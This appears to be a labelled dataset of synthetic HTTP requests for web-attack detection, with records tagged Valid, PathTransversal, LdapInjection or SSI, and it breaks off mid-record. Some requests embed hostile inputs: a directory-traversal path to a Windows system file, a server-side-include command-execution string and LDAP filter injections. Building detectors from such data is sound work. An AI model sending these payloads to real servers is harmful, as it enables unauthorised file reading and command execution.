~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36096
Start - Id: 31265
class: Valid
GET /arIek./2cq2ubam/rzU/Ikeozmert/mK1qZtYj3-KER/firldj72mc/fbetweenCIjfW/bweheNe2tidkcb3urtP/u.v@uz1@8G.imq5tryym/t73Njp9Bdwh4Eak.msf?ettron=720785&fAl=6595557&e4dzs=auFl23J992D-&OobjecthDeMaO=6bhouhs&euvhiut6i=c3i HTTP/1.0
Host: www.sTyoed.org:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.93.24.149
Cookie: oeHeons6te=7027699;r-V_F49vbscript=tletuoe8e
Cookie2: $Version="0"
Date: Mon, 30 Jul 07 14:38:16 UTC
ETag: "iZpDt0NHgoX8qTEDjFL"
Expect: qddeh=sdiabmt;loHserrr
From: harutUle@4Tes.com
If-Modified-Since: Sat, 17 Nov 07 17:25:32 GMT
If-Unmodified-Since: Wed, 10 Nov 04 10:17:13 CET
If-Match: "ARf9KdJcZha-sRsxsfGQ"
If-None-Match: "KIbvxxp63IdtC9wFB8"
If-Range: "E0Bz5_x2gUxWezU"
Max-Forwards: 4
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: l4wi AeDLYae=otoo3HP3
Range: 019-,893-4434
Referer: /oa7I/oesiI.php4
TE: gzip;q=0.1,gzip;q=0.9,trailers
Trailer: From
User-Agent: Mozilla/0.9 (X11; U; SunOS sun4u 4.4; ep-gs; rv:5.5.1) Gecko/86757583
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: FTP/2.0 www.rnYoIl.html
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 231.214.129.29
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31265
Start - Id: 14553
class: Valid
GET /e@CDpdh7/jTVm9fcK7LOnorZ/1ff3nns8adPutttg/emzbnedeiuj/bEyWWh/lnzwF/2Q79yH8F.msf? HTTP/1.1
Host: www.je6eeea.de:80
Connection: close
Accept: audio/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=41472
Client-ip: 161.19.202.177
Cookie: oh2ea9H=aa
Cookie2: $Version="30"
Date: Wed, 11 Aug 04 05:57:34 CET
ETag: W/"8pV7vNavsuZUMoVJp"
Expect: 100-continue
From: izhee@mtbHevOaee.gov
If-Modified-Since: Sat, 07 Feb 09 06:23:46 UTC
If-Unmodified-Since: Mon, 16 Jun 08 18:34:33 GMT
If-Match: "lmO8qR-IyAo1QsM"
If-None-Match: *
If-Range: Sun, 04 Oct 09 16:11:19 GMT
Max-Forwards: 7
MIME-Version: 3.5
Pragma: y5nbre='ffe3u'
Proxy-Authorization: NTLM bHBkZXhhZWFrU28wZE9lcGZxbmk4dXNwdXBwN1N5ZU5jZVVpTWVudVNkaXRP
Authorization: NTLM a25zb2huZ2FlZ3hyY2F0aG1zZ0x0bm9ZdDFsc2Fyb3JwdQ==
Range: -5623
Referer: http://0amsufo.com/n9ktUe/hsotvyj/ogytltn/rceer70h.mpg
TE: trailers,deflate,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/0.2 (compatible; MSIE 6.7; WinNT; 4it6ii; pw6v4c; osdahns)
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7668x5565
Via: FTP/1.0 225.11.146.111, HTTP/9.8 www.li0c.gif
Transfer-Encoding: identity
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 142 104.193.18.113:51 "sAoysfr0thamu" "Mon, 28 Feb 05 16:07:23 UTC"
X-Forwarded-For: 139.198.43.213
X-Serial-Number: 267686461
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14553
Start - Id: 17773
class: Valid
GET /ooA4cyZ7j1vWet/noAtmYs2zbdj1eS8/jmiSaGy4aaenri.gif?qj=3oedsla&ps=etvsX6ea&mo=h HTTP/1.1
Host: 91.188.147.93
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 128.44.100.2
Cookie: 4toobuwi=1;vyidEibMAwtg=edAnl;slcmsbXEqYp1Ha=4413542;5th=8;hpoeOu=bjbdrasosrlcl;Kdeletev2WL=864
Cookie2: $Version="3"
Date: Thu, 05 Feb 04 16:54:13 UTC
ETag: "42C1OGwM6zHLpm6"
Expect: 100-continue
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Sun, 23 Mar 08 07:28:37 UTC
If-Unmodified-Since: Fri, 27 Mar 09 15:02:08 CET
If-Match: "UIVrNrY4zTaRL9eN"
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 3.7
Pragma: hlems='tortemte'
Proxy-Authorization: Digest opaque="tmvEti"
Authorization: Basic aW1ld3RoMXM6b09HeXJp
Range: 329245-531,569228-311014,-5
Referer: /U8siv/dtm2o/92nra/rxpNh.sh
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.1 (compatible; Konqueror/7.9; Linux i386; u9ha; aubAwne1t; mtetn)
UA-CPU: x86
UA-Disp: 2786,862,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 582x198
Via: pT5A/5.1 www.cxE9nn.htm, HTTP/2.4 144.74.165.212
Transfer-Encoding: owatu6; ymret=eawco
Upgrade: hrjjsa/6.3, slosri/3.8, i8y/4.8, vli8r/7.4
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17773
Start - Id: 45819
class: PathTransversal
GET /aton/miV/UM/tVYkx3@42yjpe3/ouAoyaqDyw/FwnTPvPEpassthruWPsEeo.css?Aor_B5=39056575&tt=%2B2%3F&RiDzX=gKPMrZi-vX&xl=einerR1O&sdMcxH=280245&eosvlbotbb7=329487&tfwbde=froaa&3get=29123557&soe8bsjwEiiie=53759&oarhngoi0ry=ntvJl&Hq7netcatUu2=diPIxmnvvpph&mrtoeyouNfl=41619&ksfrbisyb=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&M9.pPPGvlocationQxq=ymwhJmxcH%40J5 HTTP/1.1
Host: 103.20.91.138
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Language: eqzs-4knw;q=0.7, fa2ewaSa-teE4d;q=0.6, Oncuso-hws, jeaes-lfetdtu
Cache-Control: no-store
Cookie2: $Version="25"
Date: Sat, 07 Feb 04 01:22:26 GMT
Authorization: oueerc rde1i12a=6ihs
Referer: /A8strka.nsf
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.1; or-yf; rv:6.4.2) Gecko/78397347
Via: 7.4 www.a4UIP2Z.css
Upgrade: ketHog/7.2, ri3cva/1.4, ovpsax/2.4

null

End - Id: 45819
Start - Id: 28417
class: Valid
GET /ewsavNaIu1jha4lm/dMtscript/lihTaiihx1/t8nYITTIQcv_DK4aH@X.php4? HTTP/1.0
Host: 160.241.126.208
Connection: keep-alive
Accept: audio/basic, application/*, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 44.60.248.223
Cookie: lna=qmen;MNinsertX=61526460;thiWho=893;csp8upohecgzrv=cAkiboWHx;qt=hIeeers;iraTemuwoxj=9
Cookie2: $Version="7"
Date: Thu, 24 Sep 09 06:38:04 GMT
ETag: W/"qVv.WnQUNMRxrOl"
Expect: egtT5nm=u6gmeta
From: oBcae9t@txO3eond.biz
If-Modified-Since: Tue, 16 May 06 20:59:56 GMT
If-Unmodified-Since: Wed, 17 Mar 10 11:19:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 22:44:12 GMT
Max-Forwards: 6
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=fnsodszp
Range: 9246-,43437-,-51100
Referer: /1lhlht/ltzOadiy.exe
TE: trailers
Trailer: If-Range
User-Agent: nsxKxriG7Q http://www.ipraaee.org
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9329x965
Via: e9mb/7.2 229.27.195.193, 5.5 www.einhoRbo.jpg, 3.0 www.ytHid.css
Transfer-Encoding: ioic; Ntrpjm=teax
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28417
Start - Id: 2555
class: Valid
GET /mooraprepr4/wwHze6j9n9I2ENa/einxes/eyDh/alfdo/80X8xml/eRT7crOEacGsKhKFP/Yfpnnl/tOtKT@N_@cWXBlaN/aexusel8/8FCOdGI4-0o-@UADsu.shtml?PRRnsmratS=sIssnzh3%27lnunionu%3Fzef&1girrl9csaito=ebPUlCTq79&uztiin=tWWzZB_jBXRT&delete72V24ir=%3Fhd&itcchmeaa3oilGh=oshiit9eisnu1g&between8Clibw=3&clSgepasswdQaPautoexecg=2teutCOoeR%26 HTTP/1.0
Host: www.elw4it.uk
Connection: close
Accept: video/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=40
Client-ip: 180.165.26.102
Cookie: ieditrtgdbtr=9SERmochaeAzNrgWcraf;witoine=8;onA1eh=pvwindow.open>?na>rmsm$:f(ny
Cookie2: $Version="37"
Date: Fri, 16 May 08 10:42:00 GMT
ETag: W/"SDugzyeX7I4AF8uK0Qm"
Expect: 100-continue
From: ofHrc@8cET.be
If-Modified-Since: Sat, 06 Jun 09 11:00:39 CET
If-Unmodified-Since: Wed, 06 Oct 04 16:44:56 UTC
If-Match: *
If-None-Match: "3xtk.GjehfSDJ.6"
If-Range: "2URm52PL20q.K-ht"
Max-Forwards: 4141
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest username="snnogtsd"
Authorization: Basic c2VldTo2MGlU
Range: -836,37315-,23-
Referer: http://www.ndh4i.ch/7asseoua/JT75r8u.mdb
TE: chunked,deflate
Trailer: If-Range
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 2.0; k9-yr; rv:4.4.3) Gecko/81204052
UA-CPU: x86
UA-Disp: 7814,3567,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: 1.2 www.aeeeLt.jpeg:37595, FTP/7.0 13.51.174.120:18087, 6.3 www.Htruh.htm
Transfer-Encoding: gzip
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 237.59.187.114
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2555
Start - Id: 31371
class: Valid
GET /dyhJkH/tonsXde2nttEusa/htsri7nraotjR/x-Anszv5KXb2Agg/s5kC6Mku/v3pe8hccstnt/rpcehs/c4FLVZ3BY5.jpeg? HTTP/1.0
Host: www.csstqEoh69.com:0967
Connection: lduchlin
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 164.204.220.43
Cookie: ee8i6hf2a9de=hj1Naue0zl;nt=epr;2yWvs=78087992;SbiKU5euQ=Nfsoi;sboS0hesoi7u=52505
Cookie2: $Version="334"
Date: Thu, 19 Aug 04 08:17:40 CET
ETag: W/"A0J0pwaWSm06g8As0Q6@"
Expect: 100-continue
From: eoeo@6smfoRe.org
If-Modified-Since: Fri, 04 Apr 08 23:02:07 CET
If-Unmodified-Since: Thu, 21 Jan 10 03:49:46 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Sep 06 01:00:55 GMT
Max-Forwards: 93
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: Basic bmFvc28yZTp0OXN0
Range: -34878,6878-7,3101-
Referer: http://aflswvp.fr/gAanooS5/vfe9d/os8tr/rknas/nnei.swf
TE: gzip;q=0.7
Trailer: From
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 5.6; sr-ch; rv:1.2.5) Gecko/51419766
UA-CPU: x86
UA-Disp: 695,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7934x883
Via: 9.3 218.173.55.127, 2.0 www.vhlweo.jpg, sola/6.9 255.250.185.247:73
Transfer-Encoding: gzip
Upgrade: ruexiD/5.5
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31371
Start - Id: 20217
class: Valid
GET /oUV18_tmpoVPLpEr/abhdikanyyuarka.tiff?nvussoui=fvigeIdTloasmMtel&s1edn9=oeu+76Eaavcogoinclude&Lrd4=xsWqwejecsbd0xhf1r&ymfStudNzlm=o2nsn2en&Agu2h1Hedj=nt&HsbEiOn=pai%28&rvennqn=uabetween+2documentn+tms&wse6u3t9j=8&whnr=o2Ge5RVX2Ajz&eD=o&dkom3espmt=ei0&ivd9xhs5hnTae=nMSjoBWze2d&l-cFki69.8bX=38313078&iHNnHot=min3d%5CwHd HTTP/1.1
Host: 155.215.194.11:247
Connection: close
Accept: image/gif, audio/*;q=0.8, video/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress
Accept-Language: wtqif-h;q=0.0, Henate-owThnhm;q=0.1, ixl5qeu-Roetq;q=0.0, eCoeo-l;q=0.6, Hlaee-lowi2Tvc
Cache-Control: min-fresh=775
Client-ip: 60.188.156.198
Cookie: lednatnae=7i
Cookie2: $Version="15"
Date: Fri, 24 Nov 06 19:58:47 UTC
ETag: "jcgM-YCpMRMKRXDm2@"
Expect: awrrh3m
From: itndhonn@hbeeaaO.cz
If-Modified-Since: Sat, 20 Dec 08 14:13:09 UTC
If-Unmodified-Since: Thu, 04 Oct 07 01:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: "FiUXAe6XNrMXB6vaSYs"
Max-Forwards: 9326
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest username="lseoiae3"
Authorization: Digest algorithm=MD5
Range: 8-0,-1872,-4
Referer: /zsywaa5e/TeSfln.asmx
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 2.3; eN-ea; rv:0.9.1) Gecko/87487656
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4940x047
Via: hadeht/7.1 www.tdnc7.gif, 9.8 217.21.185.113
Transfer-Encoding: identity
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 396 www.etsot.png "nrlge3atrzigrleagne" "Tue, 20 Nov 07 19:17:59 GMT"
X-Forwarded-For: 43.1.107.121
X-Serial-Number: 554046996797250
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20217
Start - Id: 37471
class: LdapInjection
GET /nnrskszshediasNsrt/ia2ibEqfeoadr.php4? HTTP/1.0
Host: www.ttdtd.be:01448
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 84.74.0.170
Cookie: a0eaoaPuRw=@aae4entaccess_lognph-eusrxanuyHel;uhssausoeaijir='8Ea;hsaetG=tGTXne;9g4qib=waade)(&(objectClass  =ro*);2he=otixtocnnGts;lirq4=]sys=8ep6dpsc0i
Cookie2: $Version="108"
Date: Sat, 13 Feb 10 15:22:10 UTC
ETag: "8MFqQwyHwiBi4iiImfHZ"
Expect: mo96NAia=Reyrc
From: eeLltA@an2loosG3c.be
If-Modified-Since: Wed, 08 Apr 09 05:27:37 CET
If-Unmodified-Since: Mon, 26 Apr 04 12:24:19 UTC
If-Match: "RCyuj.z5IvJhHfFFCu"
If-None-Match: *
If-Range: "wvaXxef2wAGXitVf"
Max-Forwards: 0375
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic bGduZW46ZWVhZnZl
Authorization: NTLM VnljZ2U3OFNsNnllcnloYWduU2liYWljdG5ZYXRjbm9SNGVhaWVubHRadGlmaWY=
Range: 2-927066
Referer: http://isyr.uk/eotu/ntrtt/ibIorztU.js
TE: trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 0.0; tv-ao; rv:4.0.4) Gecko/94043092
UA-CPU: PowerPC
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3899x9928
Via: 4.9 88.167.105.158:40
Transfer-Encoding: aon53o
Upgrade: ao4m/6.0, C0nat/7.0, eej/1.7, alttoo/8.0, rDeils/0.6
Warning: 121 www.ltmnic5r.png "nndoirfvI1nlN" "Wed, 21 Sep 05 18:59:13 CET"
X-Forwarded-For: 32.15.213.191
X-Serial-Number: 9576766349708862183
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37471
Start - Id: 32310
class: Valid
GET /ondy7aasltrFnnoldigy/hTtenwg4twlimeao/ow9qOnQ13IZLgfr2aJI/nQatlHb/dx/otensqqawd/varhttpD8b3YzpsW/tsh/anethdc3te9czsima.aspx?ntIrc=152&Vao4RdS_ohu=46272825&arsni=%40alll%3Bldtmtrdouo&ensaiwfuotiibeA=3to1e&usr.scriptHJZTsr6d=sosl&ntsVabm=yFwuLpvzvu.&Nsrfq3systemd2=83243&oqddboso=1edpf5he%25dlnode&gu6catU=tbsrf04hnmh0b&eaeuph=Tsgt&ui6cecTustaotst=tazmii%3F-u-ll%25&yvtotERid=3401656 HTTP/1.1
Host: www.E0Te.uk:80
Connection: owea
Accept: */*
Accept-Charset: x-mac-greek, gb2312;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=8087
Client-ip: 158.103.23.68
Cookie: l8ca=Bsn-5CEjn;ikxe=o;aeetaroese=s<iopheiframerTsr;eFslfnwmlc=n@U5CgUdNxXO
Cookie2: $Version="669"
Date: Tue, 15 Feb 05 16:19:49 CET
ETag: W/"PwGVrzKVjv.b6qx3Q"
Expect: akgezt=4oooffr
From: dyhd@dppe.gov
If-Modified-Since: Sat, 23 Jul 05 03:07:39 GMT
If-Unmodified-Since: Sat, 27 Feb 10 02:48:05 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Oct 04 24:00:24 UTC
Max-Forwards: 751
MIME-Version: 9.5
Pragma: an1r=mmen
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: Digest algorithm=cw74ee
Range: 03424-,9-
Referer: /DschNa.jpg
TE: chunked;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/1.7 (compatible; Konqueror/8.1; Solaris; ati2en)
UA-CPU: StrongARM
UA-Disp: 096,809,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7929x149
Via: t9E/4.9 www.N6wa7x2.tiff, 4.7 208.61.20.102:6
Transfer-Encoding: gzip
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 144 36.5.81.66 "nisieeaPsv62Lonttai" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 298337
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32310
Start - Id: 21133
class: Valid
GET /essNHaiiEiqsc.bin? HTTP/1.1
Host: 55.147.25.60:20
Connection: close
Accept: audio/x-wav;q=0.0, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: o-nandkp, e-aeemr, ri-suen0mL;q=0.4, fue9ne-9i0rr, etnd-relSe;q=0.5
Cache-Control: min-fresh=99
Client-ip: 139.120.122.69
Cookie: elNeOol0Asawy=atefrrnfdri4teih7;eiEtsotb=9890406;Mi1Etesa=leeey9;4iZr=sefeanbrtr)aat
Cookie2: $Version="54"
Date: Sat, 16 Feb 08 07:15:58 UTC
ETag: W/"1S4jcIoUFc4m_w.u17G"
Expect: tetnMsTh
From: idssoghm@tIhNr.de
If-Modified-Since: Wed, 19 May 04 04:22:39 UTC
If-Unmodified-Since: Mon, 19 Jan 04 09:25:40 CET
If-Match: "t-1.r5CkrPNr-_PKKEc"
If-None-Match: "oxztxuJ7vS8rg@S@P"
If-Range: Sat, 28 May 05 12:53:50 GMT
Max-Forwards: 58
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM OHV1MmUycm1ucHU1OGVvbjdhclIyb3RpZTJsYWVvYnI=
Authorization: Digest opaque="nretnehs"
Range: 08246-7
Referer: http://oian6.biz/Iyefn/e2djyAii/u5caeo.nsf
TE: trailers,trailers
Trailer: Connection
User-Agent: 36Tyttt/9.6.2.2.1
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: ootei/6.5 www.cxutAa59.css, efDZ/2.3 www.0i47.jpg
Transfer-Encoding: eonr
Upgrade: euef/5.6, Nsa8t/7.8, upugmw/9.2, hans/3.6
Warning: 738 www.hBzo7et.htm "seMl" 
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 9779680
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21133
Start - Id: 39958
class: SSI
GET /itpnooh7okddttUd3Asd/snx_5a3r.jpeg?utheon0n6tSp8e=93463317&as2ss11heoh=%3C%21++%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E&shutdowngB.k8l=8boc&ai=84&objectRzoic9=cBFvNYzAthqM&9leti=heosystem+voos%3EleTselect&leodem=ur%7ClaHm+rnau%3Bpe-zRee&D6ua8q8w=+tifromr0musr5D&whgef=a3r&coseo=fWo1tR HTTP/1.0
Host: www.airro.fr
Connection: ttuey
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: crsPoaad-eeS;q=0.9
Cache-Control: min-fresh=313
Client-ip: 225.57.174.238
Cookie: hMePghi=s8Roj1o7imgohc]
Cookie2: $Version="86"
Date: Tue, 31 Oct 06 03:15:50 CET
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 89Rhie
From: so7e5@hesdawuna.uk
If-Modified-Since: Wed, 01 Jul 09 08:18:01 UTC
If-Unmodified-Since: Sat, 23 Apr 05 10:12:27 CET
If-Match: "zYwwYYd4JxRKileUO"
If-None-Match: *
If-Range: Thu, 09 Mar 06 16:37:59 CET
Max-Forwards: 93
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 7ilWt neoUeF=c3Eyhe
Referer: http://uaaBtius.biz/rlea/ehdm/lUytzhec/0aldt.bin
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 9.4; dw-eN; rv:4.1.3) Gecko/98850283
UA-CPU: Sparc
UA-Color: color16
Via: ewNtt/5.8 210.56.216.165, 3.2 125.29.67.44, HTTP/0.7 www.aos0End.jpeg
Transfer-Encoding: identity
Upgrade: AhhELu/2.6, ney/2.3, r4p/4.0, nPq/8.1
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39958
Start - Id: 31296
class: Valid
GET /iimDnGpOhttpB0lchildj/nnrtP0-84I0-TY1LXUz/ahileOoho3eela/ezTt429u5Na1tB_.exe?toeicdap=ee&rlH0=md0paEnneaatt0seE&aan5Ted7rtHhsat=varr9+r HTTP/1.0
Host: www.JbbLt.de:80
Connection: keep-alive
Accept: text/xml, application/postscript, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.4, gzip;q=0.5, compress;q=0.9
Accept-Language: hTsgz-zsdrnlt;q=0.9
Cache-Control: max-stale=27036
Client-ip: 0.152.80.254
Cookie: eeexiurfs9a7t=s6dnodeeaa;retnepeuzT=ieki;uldeve3ihta7q9=tidef84;iaee0=l=8kcdHunlis
Cookie2: $Version="86"
Date: Tue, 28 Jun 05 16:33:22 CET
ETag: "y8hQ9nipAvRJNUl5.I"
Expect: 8ref
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Thu, 15 Jan 04 06:55:17 GMT
If-Unmodified-Since: Fri, 04 Apr 08 18:25:38 UTC
If-Match: "hq8CQatcPDLNf46.oY"
If-None-Match: "Wnt1ngqgXAz3tIZ28yI"
If-Range: *
Max-Forwards: 50
MIME-Version: 8.7
Pragma: txeaw=8alrtou
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Digest realm
Range: -388719
Referer: /0itWdua/ruaqnxat/hstuts/5eoqpe/anemfewe.tiff
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 3.3; la-mw; rv:1.8.7) Gecko/85586159
UA-CPU: 68000
UA-Disp: 913,006,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/1.4 www.wOejsshw.png, 5.1 87.79.255.40
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 19975103702041992
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31296
Start - Id: 38808
class: LdapInjection
GET /Coo/k5PtpasswdGWMiwF_b.jpeg?srl5nas7=%7Ce&ECobt3q=7099016&ikaepmsabz6=%29++++%28++%7C++%280le3a%3Dobs*%29&fmuehom=as%3Eogroup+by&a2oio5oekfa6g=3872&sSsti=3&neRyh6h9arcpr=catr&P7positionZgaccept8window.opendQG=a%25shidoBststc-nNbetweenW%3A&ten7rgxq=EorNngdn%272+&rMx2L6JP4-0usr=1027&utiete5aleipra=Eg%29eqsevalogjE3efa HTTP/1.0
Host: 182.28.129.130
Connection: keep-alive
Accept: application/*, text/*
Accept-Charset: big5, euc-jp;q=0.4
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: u4=Es
Client-ip: 103.147.207.153
Cookie: td2aoxOer=847
Cookie2: $Version="19"
Date: Thu, 21 Jul 05 11:13:00 GMT
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: huUre@isis.com
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Mon, 19 Dec 05 02:06:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4391
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Nmto snLh=d7kiptxe
Range: 65399-30
Referer: http://www.8w7v.be/asih.dll
TE: deflate
Trailer: Pragma
User-Agent: aMYapk6ba8su6alqe
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38808
Start - Id: 34241
class: Valid
POST /lfotsdmtss5teu/TP0dB_0/nMNrzZZpP6ygD6E3.cgi? HTTP/1.1
Content-Length: 94
Content-Language: 1lkO,nm,oi
Content-Encoding: compress
Content-Location: /errtal/6eips/hoonoyh.swf
Content-MD5: eXJkaVlzYzhvUms0ZW1leA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jul 05 11:20:05 CET
Last-Modified: Fri, 28 Oct 05 12:07:42 UTC
Host: 209.0.195.153
Connection: o3Lnlw
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.2, deflate;q=0.4, identity, gzip
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 7.135.173.221
Cookie: tormfiU=L6eah;ddsu=scAchfocnixajat;te=ledtrbf~vh=q;gid3aftd=etsEtihsheitaodVgr
Cookie2: $Version="53"
Date: Thu, 08 Sep 05 23:39:11 CET
ETag: W/"sLpsv5OJiPnFYrInalD"
Expect: 100-continue
From: e4eeec@tlsenuWe.de
If-Modified-Since: Wed, 30 Mar 05 01:54:21 GMT
